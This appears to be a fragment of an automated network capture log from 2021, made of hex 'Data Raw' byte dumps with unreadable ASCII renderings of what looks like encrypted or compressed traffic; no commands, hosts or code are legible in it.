7e 44 9e d6 6d 5d 24 4f f1 5c 2d e4 21 29 5a 06 a7 76 f0 4a 3b 11 60 ad 22 0c 10 76 f3 a2 62 71 17 42 e9 3d 4d 60 81 a3 d0 7f
                                                                        Data Ascii: vv2gUXGE#BG)v7 csbloq=E/<S_hS?2Is<r@PtiLb)Hq.'6pZc|XftEc'Dpu%5L-%OzN'Gi7!36~Dm]$O\-!)ZvJ;`"vbqB=M`
                                                                        2021-09-28 06:15:57 UTC107INData Raw: 0a 98 4d 05 de 0a 6a 28 94 2e 9c 2a c6 aa a0 91 3a 01 75 41 f4 9e 8d 47 d2 14 79 fc 31 30 87 ac d8 e9 6b ed e3 6c 75 2f 1c 6f bb 2e 7e 99 55 86 2b 68 37 70 3b d6 9a 01 1f 46 18 49 70 cd 79 48 35 af 5d 24 fd 9e 0a 43 1e ca dc e1 39 75 13 a2 f5 69 4a 1d e8 ed e7 c6 c8 74 ef 38 3b de 00 8f 07 10 07 db ac c9 58 57 47 36 fb 91 5c 32 18 8e 94 5e dc bb 46 e1 b4 76 c8 a8 4c dc d3 f5 cb 12 b8 ed aa 9d 64 7c 1f 19 fc 1a 66 0f 14 84 1c d5 33 fd 5d e0 80 2a ee b0 a1 89 c0 d1 e3 69 d3 a5 b7 5d b5 4b ba 80 c4 42 a3 b5 df 93 1a 42 90 15 f1 f9 29 2f 7b 17 8e 45 6a 15 f3 82 ac aa 57 6f ab d4 01 e9 ed f0 59 cd 1e 7d 69 ad 6c b6 47 27 10 fa fd 69 e1 8a a0 5b 1e 1d 08 97 5c b4 66 ca dc b0 16 3c 97 e4 f8 1f e0 a0 1e 09 11 46 2a b7 32 cd c6 2b 22 3d cc cb b2 03 1b b5 d5 fa f2
                                                                        Data Ascii: Mj(.*:uAGy10klu/o.~U+h7p;FIpyH5]$C9uiJt8;XWG6\2^FvLd|f3]*i]KBB)/{EjWoY}ilG'i[\f<F*2+"=
                                                                        2021-09-28 06:15:57 UTC108INData Raw: fe 1c be 1c 12 ca d2 5c 89 ff f3 6d 34 22 50 f1 03 c2 a3 ea ff 77 aa eb 78 e1 fb 13 de e0 ef c1 4b 6f 59 07 c2 da 2a d3 b5 49 f8 c3 aa 6e b2 77 41 bb 26 35 21 39 b6 32 61 4d 8d de 6d bf 2d 50 e6 51 2d c8 38 3c 59 0e b8 60 26 62 01 0b 50 a2 0a 20 13 76 f9 35 43 70 06 6e 05 21 5e 6e 8b b0 a3 47 a1 a7 1f 0d 73 5c c0 3d ce 94 db c0 6a 18 bc f8 ff 7a 37 68 aa 9d 75 f0 76 95 87 c4 f9 17 1c bc c8 a4 40 ac 6a 1b 74 f9 33 72 8b a9 f9 68 fa 42 7f b8 6d 6c 54 f8 4b 0d a8 dc 66 57 d0 4d 80 37 9f fb e5 82 e0 50 99 04 b9 75 28 b1 e9 f3 bc 62 7d 7b b9 a4 c3 26 5f f0 00 49 01 9d 01 7d 97 15 8b db ae 5e 10 2a dc fb 71 ca 9f 02 ea 80 99 82 1e 20 83 bd 5c d7 04 1e af 4c b9 75 f3 4a 22 6b f9 ca b9 78 11 15 1f cb 84 5d 7c b7 25 09 11 51 73 e0 fe e6 7f a1 fc 69 3f 98 d1 66 18
                                                                        Data Ascii: \m4"PwxKoY*InwA&5!92aMm-PQ-8<Y`&bP v5Cpn!^nGs\=jz7huv@jt3rhBmlTKfWM7Pu(b}{&_I}^*q \LuJ"kx]|%Qsi?f
                                                                        2021-09-28 06:15:57 UTC109INData Raw: f1 d9 b6 bb 23 e1 5e 92 0e e0 5d af b1 56 94 0b 46 8b f8 fe c4 33 3b 11 36 2d 54 60 01 88 79 a3 be 42 17 97 f9 01 e3 f7 f0 4d dc 1f 6f 63 cf 7c 8a 40 0d cc d2 fc 63 c3 9d df 1e 8f 31 1d 8a 4d b1 f8 e2 dc b4 09 38 b9 f7 d4 0f f9 f3 22 08 11 48 1a ec c9 cd cc 55 2f 32 df d4 a1 1b 00 ca d2 15 fa ba 7c 80 50 e2 f3 6b 77 6c a7 fa 46 fb 91 99 32 f2 79 a1 35 36 36 8e a0 36 5f 1e f3 b6 5e 3c 14 36 1c 04 f5 2a 95 0f 82 48 d1 bd f8 54 85 69 65 f6 24 27 8a 3f e1 95 9f 7b 8a df fa 46 f9 f4 86 e9 35 be d6 72 27 69 42 fd 1b dc 74 41 4d cd 8c 41 5f fc c6 9d 74 31 e3 8b e0 5c 91 e0 9c 8b 0c d4 fa 4c c4 86 52 a2 ce 18 bc 72 86 12 58 a5 39 ef 43 6b 0d 9f 77 76 36 78 a0 70 8b 33 11 1c a9 5d 00 bb 30 08 3e fa 4b 3b 82 37 0d 0e 53 60 6a a2 f1 e4 aa e2 0a 57 db 94 3f 2d d8 2c
                                                                        Data Ascii: #^]VF3;6-T`yBMoc|@c1M8"HU/2|PkwlF2y5666_^<6*HTie$'?{F5r'iBtAMA_t1\LRrX9Ckwv6xp3]0>K;7S`jW?-,
                                                                        2021-09-28 06:15:57 UTC111INData Raw: 55 0e 31 ad e8 8a da e5 41 e4 50 95 3f 98 5d 22 be 86 46 b4 4a 4f a5 f8 8b 35 11 59 da 0b 58 06 b5 f6 79 8f 13 e4 25 89 53 10 2e f4 0f 75 ca 99 2a 5b 15 99 9d 6b 93 81 bc 4d 39 00 36 22 4c b9 7f 34 72 22 7a db 1f bc 50 2f 01 37 03 58 57 71 b3 32 0e 7e 0c 7e 9e 67 3a 7d d0 d7 61 2b b4 f5 97 1c 71 a1 3f 1a 0d 97 d2 45 85 4e 42 12 1e 3c e8 fe 88 48 22 98 b4 90 c2 b2 32 e6 e3 ce 14 e6 f4 7a 9c 5c d3 76 7f 80 d1 46 7b 17 24 23 cc bd 57 24 82 30 50 35 1e cd d2 f8 00 97 c9 be b7 25 20 a4 54 40 2d 60 bf 17 31 5e 25 03 36 0a 2e 4d 11 ca d6 43 8b 94 22 96 02 5d b0 a0 9b 13 8e 45 43 fe ba 9c 40 bd db 79 fc 2a 0b 4b 59 d5 f8 6b 8f 26 6d 59 2c 28 68 aa 2e 1d 5c 54 aa 28 10 6b 70 3c c4 b8 08 39 9a 26 6e 73 19 7b 33 25 bd 58 08 d8 e1 08 6d 03 e2 e4 eb 3b 60 d7 8a 48 43
                                                                        Data Ascii: U1AP?]"FJO5YXy%S.u*[kM96"L4r"zP/7XWq2~~g:}a+q?ENB<H"2z\vF{$#W$0P5% T@-`1^%6.MC"]EC@y*KYk&mY,(h.\T(kp<9&ns{3%Xm;`HC
                                                                        2021-09-28 06:15:57 UTC112INData Raw: da 4e ef ef a9 5c 4c 89 dd 79 0b be 8b ff 11 c5 a4 71 ce db 56 58 4d 80 54 b6 4c 2a f9 91 f4 4f 9c 01 e1 5f 1b 04 e5 8b 41 75 4a 74 de 01 a9 bb 57 1c 5e c7 db f0 6b 75 24 88 7c 67 37 46 e6 7f 95 24 32 bc 1c 75 1e d5 48 02 2f fd 67 9d 04 1f db 1d 58 62 6c 8b b6 d4 68 f3 04 6e de 82 17 be ce 3d 33 c7 25 00 b0 f8 ad a4 8b 3e 0b 8f 8b 68 71 13 30 c5 dd 43 ee f3 70 75 cc 8f a2 68 35 d4 15 fb 46 08 b0 39 44 11 b2 15 71 e7 f1 ac 75 f0 2d bf 89 78 75 84 6f df 5b 19 48 69 8e 52 9c 37 f7 64 82 98 76 bd 44 df 4d a0 48 9e 8d e3 25 40 00 c4 56 db c1 a6 16 f2 6c 2a 3e 55 d1 78 14 b0 eb ff 76 ab eb 78 e9 23 6c 31 ca d8 cb 5a 6b 45 1a d9 fc c8 c5 da b7 27 c3 aa 2b a4 76 41 f0 29 38 23 3f d9 f8 63 4d 87 cf 62 5d 22 41 e9 78 3a a7 cc 2d 59 08 90 6d 27 62 0a 03 70 b6 07 cb
                                                                        Data Ascii: N\LyqVXMTL*O_AuJtW^ku$|g7F$2uH/gXblhn=3%>hq0Cpuh5F9Dqu-xuo[HiR7dvDMH%@Vl*>Uxvx#l1ZkE'+vA)8#?cMb]"Ax:-Ym'bp
                                                                        2021-09-28 06:15:57 UTC113INData Raw: 40 bc 1a 29 af cb f3 30 50 67 c8 22 5c 2c b0 22 01 2e 5d 0e c1 fe 95 29 b8 37 95 32 10 b3 a9 86 ed 83 93 40 7a 01 b3 6d d1 1c 79 e3 1d 35 87 87 d2 e2 73 c3 e3 6c 75 3d 15 6c b8 20 7f b1 c5 c5 d2 7e 3c 76 23 f4 77 0b 33 55 38 54 50 d0 7a 1f 3b a9 32 da d6 e4 0e 7c d3 dd 0a 66 10 6a 09 8b 42 76 46 04 cb 0d f2 cd d1 52 af 39 17 d9 6c ad 19 20 6c 08 ad da 6e 4c 48 ec f1 91 4d de 07 ce 7b 49 e3 ae 7d 53 ad a0 c0 be 4c dc e4 e4 34 13 9e db e9 f5 47 7d 0e 16 cb 73 99 0e 32 bd fd d8 2b 2d 7d 46 93 2e cc 80 84 89 ca c4 bf e2 d8 a5 ac 39 f8 0b 44 8b ce 7f ae c9 27 92 0b 40 8d 84 0c d4 3d 2b 6f ee 8d 45 64 05 5d 07 7e a8 56 0a 12 b9 fe e2 f6 e5 42 8f 1c 72 74 42 66 85 70 db 6a fe f5 51 dd 72 30 f7 00 35 11 90 42 b6 69 d6 33 b5 25 3a 6a ec 45 1c e8 c6 25 03 11 53 39
                                                                        Data Ascii: @)0Pg"\,".])72@zmy5slu=l ~<v#w3U8TPz;2|fjBvFR9l lnLHM{I}SL4G}s2+-}F.9D'@=+oEd]~VBrtBfpjQr05Bi3%:jE%S9
                                                                        2021-09-28 06:15:57 UTC114INData Raw: d0 50 4d 48 96 3c 27 6d 0d 73 f1 ff 25 4b 24 da 44 33 8d f3 8e 5c 51 4a 4d e2 12 a0 c0 5d 83 4e 4f 1b 3a cf ec d2 87 d2 b9 64 5f 7b c9 97 82 ed e3 d5 37 e8 db 84 97 7b d9 01 9a 37 d8 5f c2 0c 37 27 d9 9e 43 04 b2 30 5c 45 f5 33 d3 de 23 f5 c9 bc bd 30 37 ab 5a 6e 2a 43 b1 03 3a 47 11 70 30 26 27 74 6f 24 3d 94 37 b7 31 97 2a d7 bb bf ae c5 13 69 48 f7 bf 9a 91 43 0f 7d e3 60 35 87 87 d2 e2 71 04 1c 41 50 3c 0e 7b 8b 1a 64 79 47 a1 29 6e 37 6f 26 30 65 2c 3f 55 39 53 1b 70 84 cc d0 b1 46 33 dc e4 19 60 16 c7 22 ea 17 61 7a 8a 4c 69 4c 04 c5 12 ed d5 c5 5c 40 33 24 e0 83 a9 2a 36 0a e6 7a dd 07 af 46 ff fc 96 33 29 19 8e 83 27 1e bd 7e 50 a2 ac a7 7a 5f d8 c6 93 cf 12 94 c2 7e eb 53 48 0c 16 d4 50 6c 10 5c 52 ff fd 15 f2 62 86 85 45 18 99 85 8f c7 b4 70 f0
                                                                        Data Ascii: PMH<'ms%K$D3\QJM]NO:d_{7{7_7'C0\E3#07Zn*C:Gp0&'to$=71*iHC}`5qAP<{dyG)n7o&0e,?U9SpF3`"azLiL\@3$*6zF3)'~Pz_~SHPl\RbEp
                                                                        2021-09-28 06:15:57 UTC115INData Raw: c0 93 04 f6 0c 37 c5 73 66 9a a5 9e ef e3 0d 42 d5 f9 51 94 d8 28 32 5f 94 3f 5f ea bf bd 85 04 ce c8 8a 68 64 0c 09 c3 47 5c d5 a6 df 75 cc 81 a3 7f eb 01 fb 23 49 19 b9 2b 41 dc 77 8b 6c f5 ce 2a 72 f2 27 b1 e5 35 ac 52 78 c0 4e 17 2b fc 9e 5b 16 b1 e7 6c f1 d5 66 b5 98 1f 56 a2 61 f0 df eb 34 48 30 27 cd c4 db 87 fd 88 2f 21 36 40 0f ad fa 2e e0 d7 2d a8 90 37 ea 25 07 ed c0 d1 d0 4f 4d 61 10 c8 f8 10 c2 b1 3e 60 c2 ac 40 b0 75 3a b9 3b 35 25 44 f1 33 61 49 85 f4 72 47 3f 55 e6 b3 29 d5 c6 2d 75 19 ba 01 63 63 00 14 62 dc 4c a5 12 72 f1 c9 40 58 22 47 f6 2f 40 7b 84 b2 c9 65 bb 59 1a 09 5b 5a d6 06 db 84 ca be 4d 08 b9 e2 29 4b 1b 7a a2 b9 0c cd 50 94 83 c3 07 9e 5e bd ce 88 7b a5 79 14 5c d9 36 64 7f 85 b2 18 5f 53 7a b2 77 6b 24 17 b4 0c 82 d2 4a 5a
                                                                        Data Ascii: 7sfBQ(2_?_hdG\u#I+Awl*r'5RxN+[lfVa4H0'/!6@.-7%OMa>`@u:;5%D3aIrG?U)-uccbLr@X"G/@{eY[ZM)KzP^{y\6d_Szwk$JZ
                                                                        2021-09-28 06:15:57 UTC116INData Raw: 51 06 4f 32 2f a4 29 32 d7 e4 13 61 16 d9 cf e6 3b 7b 04 91 b0 68 66 44 c2 76 ab c7 ce 58 45 10 21 d7 7d ae 11 9d 04 f1 ac db 7b 55 56 f9 ec 98 74 c4 18 8e 8f ea de b9 6d 5d a4 71 dc bc 4a 55 e3 fc 35 12 87 cc b9 ee 5a 6a 83 0c dc 69 c4 0f 1e a6 ef d9 25 6b 59 5a 93 2d f2 02 ad 98 c0 db 86 fc fb b4 bd 32 ed 46 a6 99 ef 5d b8 ab c4 9f f5 47 a6 dc f6 c4 38 2b 11 3a 1e c9 45 12 87 69 a4 bd db 07 1a d6 00 f0 f1 f2 5a db 1e 7c f8 6c 6d 9a 56 87 7a d5 e8 41 4e 8c cf 02 37 f0 03 9b 48 8f bf c8 cd be 95 2d 64 f6 d9 0f f3 d6 29 02 ef 43 1e c9 de cf bd 62 3c 32 db d8 68 01 15 b9 dd 1b f8 27 c6 97 97 62 c7 7c 89 6c 98 f7 46 f6 97 48 37 99 c0 bb 26 31 27 98 bc 22 2f a8 d9 0c da 22 e3 43 1d 04 f0 35 83 0c 80 49 cd ef 2e c9 b7 76 70 09 23 11 e3 a2 d6 8d 0f 56 53 e8 df
                                                                        Data Ascii: QO2/)2a;{hfDvXE!}{UVtm]qJU5Zji%kYZ-2F]G8+:EiZ|lmVzAN7H-d)Cb<2h'b|lFH7&1'"/"C5I.vp#VS
                                                                        2021-09-28 06:15:57 UTC118INData Raw: 7c 5a 3f 55 de 09 2c c8 38 2c 48 0b a7 73 d8 63 2c 1b 69 b6 0e 2a a5 44 ee c0 49 63 12 46 e7 20 49 96 80 9e db 78 b3 a2 1b 34 59 40 3e 36 cf 90 c8 bf 44 88 b0 e1 c4 4f 37 79 a5 a2 89 8a 7d 92 85 d3 d5 f9 0b b9 ce 9d 61 b2 94 10 70 c0 3a 65 57 89 81 12 5b 45 7f a3 63 74 c5 1d 66 08 b8 dd 7a 4c d7 36 b6 33 87 01 cc 5a ed 23 26 2c 9d 7f 23 a2 95 45 be 73 72 be 06 80 c7 14 74 64 16 57 03 b5 e5 7c 8a ed 88 8c 9c 58 38 39 f1 0f 73 c2 15 01 ce 80 98 e7 a5 91 81 b7 70 17 1b 33 98 5d bc 69 25 73 0e 68 e4 07 bc 50 38 10 00 cb a4 56 57 99 08 0b 46 56 8c 1f 0b 3d 12 08 db 68 35 b6 f9 89 2c 72 b6 8d 1d 0d 97 2e 56 83 4e 46 8a 81 32 63 49 58 fd e9 89 76 09 fd 9a 91 e7 e8 c6 3b f5 7a cd be 77 d5 02 1e 83 c7 40 16 58 93 20 48 19 78 17 b3 21 5d 5d d6 13 c2 d7 00 b1 c9 be
                                                                        Data Ascii: |Z?U,8,Hsc,i*DIcF Ix4Y@>6DO7y}ap:eW[EctfzL63Z#&,#EsrtdW|X89sp3]i%shP8VWFV=h5,r.VNF2cIXv;zw@X Hx!]]
                                                                        2021-09-28 06:15:57 UTC119INData Raw: 0c 20 8d 55 2b 5d ca cd b5 ab 23 4b f1 c0 1b ca 78 36 08 1b 56 1a 1b cb cd c0 36 b0 35 df cf b3 01 3c bb fb 12 e5 b8 f4 97 86 6e 7a 7a 54 79 a0 e9 7f 51 80 9e 2e 89 f7 67 36 3c 21 9f 3c 38 d1 a9 f4 16 d6 34 b0 aa 1c 04 fe 0e 9b 1f 84 5d cd ee 27 cc 92 aa 66 f7 24 2a 64 b4 de 95 9e 69 a1 e6 ea 51 ef 72 91 5e 37 bf 7e 68 2c c5 54 e9 39 6c 7e 69 1c d8 a4 88 5f 93 58 8a f9 3c f0 80 ff 5e b8 7f 09 4b 0c 82 d2 9a 49 ac f0 b3 ed 1f a5 77 a9 a7 49 a8 25 e5 43 b7 0f 9f 7b 71 b0 69 b1 7d 94 36 0e 86 36 d6 18 ba 3a 2a 3e f7 c5 86 1d 03 1c 0b 7a 28 67 9a ad cd 84 e0 0d 40 b8 1a 17 95 d2 3d 36 3d 80 17 6a f0 ae bc f3 14 b2 8f 90 40 74 18 21 cf 54 51 ea 0b 18 74 cc 84 82 6d 3d 0c c9 c0 55 1a b9 2e 51 8b 63 8f 6e f6 ca 66 65 d3 31 a6 95 58 bc 52 7c db e8 04 73 a8 e1 17
                                                                        Data Ascii: U+]#Kx6V65<nzzTyQ.g6<!<84]'f$*diQr^7~h,T9l~i_X<^KIwI%C{qi}66:*>z(g@=6=j@t!TQtm=U.Qcnfe1XR|s
                                                                        2021-09-28 06:15:57 UTC120INData Raw: 31 98 4c b8 6b cf 66 0a c8 f3 14 b3 78 03 10 1f c7 4c 7f 93 99 23 04 56 ef 71 e0 fe 12 c9 da db 62 13 81 e8 8e 08 5f 31 b1 1d 0b 81 5e 51 83 5f 45 10 22 25 c5 5d 8e ea 39 b6 3c 84 d6 90 82 fc f2 d8 28 df dc 7e 96 51 c2 8f 13 80 d1 46 00 c2 30 0b 65 ae 50 05 9a 09 52 5a da db fa 03 29 86 c3 92 f1 27 38 b8 6d c3 3a 48 b7 04 bc 5f 33 8e 30 1e 3a 58 2d 7d c2 6b 22 80 0a 60 2e c6 b6 b8 1c 3c 12 45 42 e7 95 9c 64 c4 34 2e fe 20 20 2e 96 e0 fe 44 d4 1f 6d 5f 8f 15 47 af 3d 7c 4f f7 aa 29 75 14 ec 3c ce 6e 28 3c 46 33 4d 48 35 69 16 07 44 5f 20 dd de ee 95 f6 35 02 e5 29 4f f7 9c 63 69 4a 0c af 5a e3 c6 c4 80 22 ce 3a d4 7b bb 15 01 10 e0 b6 f2 3f 51 47 f9 d2 bf 5e d5 1e e1 fd 48 cf b5 56 55 b7 76 ce c7 aa d9 cc fa 26 05 85 d2 c7 1a 4d 7d 19 0b bb 93 65 0f 14 c3
                                                                        Data Ascii: 1LkfxL#Vqb_1^Q_E"%]9<(~QF0ePRZ)'8m:H_30:X-}k"`.<EBd4. .Dm_G=|O)u<n(<F3MH5iD_ 5)OciJZ":{?QG^HVUv&M}e
                                                                        2021-09-28 06:15:57 UTC121INData Raw: 3d 7f a6 62 8d dc 1b be 14 7c 21 d0 31 02 2f e8 dc 9f 19 08 1c 19 4d 7d 98 9b 8b f5 82 ce 08 46 d1 f1 93 94 d8 26 29 4e 8d 18 79 fc bf a6 90 19 93 71 8a 44 6b 69 03 cb 47 5a ed cb 86 56 df 92 aa 68 2a 13 cc 16 48 35 b6 39 4f 17 6c e0 eb f6 d9 4f 67 f9 38 a7 8b 67 ad 43 6b ce 68 eb 51 93 93 4a 02 88 aa 46 88 90 61 aa bf 1a 49 ab 72 9c 83 cf ca 4d 34 1e dd d4 d2 e1 d5 f1 6c 26 29 62 ca b7 c2 b2 f7 ca d3 ab c7 74 fd 36 17 e5 db cf c1 5a 72 4b 1c 36 f3 3e c4 a4 46 0e e8 a9 44 b4 5f 65 fa 3a 3f 09 ac b6 32 6b 5e 85 c1 63 5f 3b 50 f7 b5 33 d8 c6 2d 75 05 cb 8c 27 62 06 03 66 b8 1b b7 05 76 e8 c8 5c 6c e9 47 da 31 4f 79 ff fe d9 60 a4 b6 08 0d 40 5e c0 31 f0 94 c6 a6 5e 0e bc ed c0 55 2a 96 a1 97 64 9a 57 9d af a6 d0 e3 12 d3 39 8d 64 aa 79 1c 43 d6 20 65 81 95
                                                                        Data Ascii: =b|!1/M}F&)NyqDkiGZVh*H59OlOg8gCkhQJFaIrM4l&)bt6ZrK6>FD_e:?2k^c_;P3-u'bfv\lG1Oy`@^1^U*dW9dyC e
                                                                        2021-09-28 06:15:57 UTC123INData Raw: 68 39 54 aa 29 6d 3c 70 3c d4 64 00 32 44 33 4b 5b b3 7b 33 2f c3 5c 20 d7 ee 0a 6b 09 c5 dc eb 3b 70 09 8a 4f 72 7a 1e c0 57 e2 c6 ce 59 50 38 2a d6 77 aa 10 7f e2 f0 ac d0 77 0c 74 f7 f8 86 33 dd 19 8e 8f 42 c9 97 e2 5a b5 7c e0 ce 5c d8 c6 f1 46 35 95 c4 a2 f5 48 6c 1b 09 fc 69 63 0f 18 bb 73 d6 33 fb 74 43 84 3b e2 8e 86 2b d1 dd 98 e5 fb 6c bc 32 ed 5b be 9e ca 74 ad a6 dd 84 86 41 8a eb f1 c6 3b 3c 06 29 98 c9 e5 12 87 69 0e bb 50 14 0e fe c8 e2 f6 e9 4c c9 1b 51 5e 57 6d 9c 40 a8 6c d2 fc 68 f6 8a de 0e 09 19 a0 8a 44 b3 76 e2 04 b5 09 38 78 e1 c0 27 c9 df 36 0e 06 cf 35 d8 c8 cc d5 27 2c 34 c9 d8 3e 9e 1f aa d9 a6 e2 32 df 83 ae a6 d9 6b 7d 7c b0 e9 7f de 84 9e 22 8b 52 a4 35 3c 26 9d a5 2b f9 0a f5 02 c8 34 b0 b4 1f 04 f2 3f 07 18 84 57 df f1 28
                                                                        Data Ascii: h9T)m<p<d2D3K[{3/\ k;pOrzWYP8*wwt3BZ|\F5Hlics3tC;+l2[tA;<)iPLQ^Wm@lhDv8x'65',4>2k}|"R5<&+4?W(
                                                                        2021-09-28 06:15:57 UTC124INData Raw: a9 50 4c 76 57 04 3b 39 29 15 f1 30 64 c3 3a a3 e9 4d 2c 54 e4 a0 57 4c 39 2c 5d 26 e0 78 26 68 7d 93 61 a7 0e a1 04 74 82 5c 42 70 13 44 8d a1 5f 68 85 9a 35 62 a0 ad 19 20 d2 eb bd b1 e2 98 dd b9 4f 62 3a fd d7 4e 1f 30 a2 bb 7d f6 d4 95 87 c4 fb e3 18 af fe 8e 64 ec 6b 11 5c c1 32 72 90 92 8d 1f 70 72 7e b2 66 6e 2a 18 54 f3 af fc 74 5d a9 b7 a6 36 9b 81 bf 77 e4 5a b7 55 9c 75 22 b7 99 49 ad 66 77 b4 fc 9a 15 10 73 e4 08 3f 85 b4 f4 7d e9 61 88 a0 83 77 69 2f f4 05 7e d6 8a 2e ce 91 9d 90 8f 92 ad a9 54 72 77 37 98 48 c7 0d da 72 28 43 8a 15 b9 5a 23 0c 0c c5 5a 46 7f 84 2f f0 7f 2a 79 e9 cd e9 7d da db 77 32 8f fd 92 0d 73 aa 4c 1c 21 91 d4 7a 16 42 57 00 36 20 e9 e4 70 eb 1f 90 a2 ff a9 9b 91 e2 cb 93 3e f7 fe 61 85 53 d4 13 10 9f dc b9 15 fa 2b 21
                                                                        Data Ascii: PLvW;9)0d:M,TWL9,]&x&h}at\BpD_h5b Ob:N0}dk\2rpr~fn*Tt]6wZUu"Ifws?}awi/~.Trw7Hr(CZ#ZF/*y}w2sL!zBW6 p>aS+!
                                                                        2021-09-28 06:15:57 UTC125INData Raw: 65 5c 7e 6f 9a 51 0f 05 ac 65 68 e5 88 d0 05 85 38 2f 94 64 b8 6f ea 43 b4 09 32 76 ef fc 22 e0 db 30 22 7f 3c ab d9 c8 c9 d9 2f a7 17 f2 c0 94 0d 11 8a 40 04 f3 34 d4 9d ae 42 da 6b 71 47 da 83 ce f3 80 9a 3b 92 45 86 18 33 01 96 be 1f 73 a9 f5 02 dd 32 b0 24 1e 04 f2 0c e4 61 1d 56 de e6 31 c8 20 4c 48 f8 04 22 f9 93 6a 95 9f 7a 9d e4 e1 6a fb fe a8 74 5d c0 45 78 0f d5 5f ec 8b ea 53 67 30 d3 9d 6b 9b 93 5e 9d 6c 13 dd 82 fe 4b b0 04 55 c4 1a 0e e9 85 5b 37 77 8f c1 2d ae 71 a1 cd 49 a8 2f ec 43 5e 0e 9f 7b 4d 53 10 28 7c 95 26 05 81 84 50 35 b5 16 1d 3c d7 15 8c 0e 08 12 1f 7a 5e 64 9a a1 cf c0 9c 94 47 d7 86 08 81 42 09 17 47 b4 08 7e cb 5e b7 87 06 af a7 a6 6a 60 1c 0b a7 39 c5 ff db 9d 6b d9 1f 8f 54 32 2a dc fd 69 f1 b9 28 48 19 6b a7 43 f5 d9 43
                                                                        Data Ascii: e\~oQeh8/doC2v"0"</@4BkqG;E3s2$aV1 LH"jzjt]Ex_Sg0k^lKU[7w-qI/C^{MS(|&P5<z^dGBG~^j`9kT2*i(HkCC
                                                                        2021-09-28 06:15:57 UTC127INData Raw: 22 7a ec 86 16 ee 26 9b 88 71 8c 88 95 7b 0b 08 30 b2 26 c7 e6 da 72 26 74 ce 8e 9c 7d 27 33 00 fc 7a f8 79 9b 23 19 56 2b 71 e0 f2 10 17 a4 42 69 3f 98 e6 ac 86 52 9b bc 3b 12 a9 f3 e6 81 5f 44 13 1e 1c ef fe 88 c0 59 e0 39 85 d6 9e 8e d9 79 e1 11 f9 d2 65 a9 77 65 00 14 80 cd 6f 39 d4 24 25 ec c0 2e 96 b3 21 53 45 9c 57 f7 df 27 a0 d6 fe 9d 81 26 ac 45 5b 2a 60 9c 10 31 5e 19 e0 4f 93 2f 4c 01 c1 83 f1 0d b9 2d ba 35 87 90 6a 93 3b 12 5a 48 dc 9b 8f 47 d4 36 17 82 b9 27 8c 83 dc ab f6 df 30 62 7f 32 46 44 6e 2b 68 67 4b a5 01 52 3e 70 3a e4 0a 7e aa 45 33 4f 44 6d e1 16 02 a1 7b 3f 94 c4 ec 69 09 ca c3 e7 13 47 0b 8a 48 43 20 69 59 0c e3 c2 d1 18 cb 1d 16 da 5b b7 42 30 f3 f3 ac da 73 7b 6a fd fa 97 76 bf 66 17 84 48 cb a0 3b c0 90 5b c6 8e 42 9d ec 09
                                                                        Data Ascii: "z&q{0&r&t}'3zy#V+qBi?R;_DY9yeweo9$%.!SEW'&E[*`1^O/L-5j;ZHG6'0b2FDn+hgKR>p:~E3ODm{?iGHC iY[B0s{jvfH;[B
                                                                        2021-09-28 06:15:57 UTC128INData Raw: 27 0f b1 63 9e 0f 61 85 2d f1 6d 59 62 e1 e4 66 3d 6a ae 11 0f 07 37 9d 38 6a 74 9a c3 06 2f f7 da 99 26 25 0f 0e 54 59 0c e4 3e e4 aa e6 12 2b 4d a7 3a 9b fe 33 57 69 9a 12 6a eb a3 9f aa 04 b2 89 a1 06 1e 83 20 c9 43 43 90 41 bc 59 c3 a3 b5 17 1d 02 c6 e8 49 06 a9 00 65 04 64 89 44 9d a7 dc 75 f0 23 a8 f7 ea 88 7f 72 f7 55 7a 70 a1 9a 5b 12 9d ed 43 88 90 61 9f f2 77 c7 aa 63 8f 83 9a ae 69 35 1d ea db a1 ae da f6 6c 20 29 55 f1 8d c0 a3 e6 fd 47 d4 72 73 eb 21 1c 8a 52 fd ec 45 43 4b 60 e8 c4 17 d3 b5 5e 0e ee ae 44 b4 5d 2f 84 a3 34 21 3d a9 40 fb 68 a0 d1 4b 53 5e 70 db a7 2c c8 27 35 71 23 ba 7a 20 48 6e 6e f9 a6 0a a0 0d 05 63 fa 6e 7f 31 59 85 05 08 6d 81 b2 c7 6d 88 8a 19 25 5a 76 ae 49 7a 99 d9 bf 52 6d 26 d9 fa 45 11 77 d4 9b 14 8e 51 94 98 d7
                                                                        Data Ascii: 'ca-mYbf=j78jt/&%TY>+M:3Wij CCAYIedDu#rUzp[Cawci5l )UGrs!RECK`^D]/4!=@hKS^p,'5q#z Hnncn1Ymm%ZvIzRm&EwQ
                                                                        2021-09-28 06:15:57 UTC129INData Raw: 5e bf 8d 87 c7 c9 fa fa 1d 6d c3 08 29 75 9d 09 fe 67 54 aa 09 f0 3b 70 3c d9 4c 2d 31 44 35 61 d9 50 e2 32 2f aa 7d b7 d7 e4 08 f1 2c e7 cd cd 1b fd 09 8a 4e 49 da 10 c0 0d f9 ee e3 5e 51 3e 11 56 03 31 07 10 07 d1 34 da 68 53 dd da d7 80 7a f5 80 8e 85 48 ef 2b 79 5a b5 6f e0 85 5f d8 ca d6 b3 6d 0d c5 a8 e2 6c e4 1f 1d d4 db 42 22 0c 8a de 48 33 fb 75 70 15 2d e4 98 9a 83 e8 f6 8e f1 d5 8f 3b 4c 7e 4b ba 8e c2 c7 a9 a6 db 09 2e 6b 98 cd d0 4f 3d 2d 00 1f 2e 42 6e 12 98 62 84 87 54 00 1c fc 87 9d 6f e2 5d c9 2f e2 74 53 6d 00 72 08 79 f4 dc f2 e5 8c cf 28 b4 1a 02 9b 5d ad 4a e7 cf b4 0f 18 ef 9b 4d 0e e2 df 16 94 11 42 32 42 ed e0 d4 07 1d ae df cf b2 32 aa ad d8 04 ec 39 e3 ba 84 6f de 41 f5 13 2d fc 57 f6 a0 03 24 9d df 39 10 11 36 af 91 a2 d1 a9 f5
                                                                        Data Ascii: ^m)ugT;p<L-1D5aP2/},NI^Q>V14hSzH+yZo_mlB"H3up-;L~K.kO=-.BnbTo]/tSmry(]JMB2B29oA-W$96
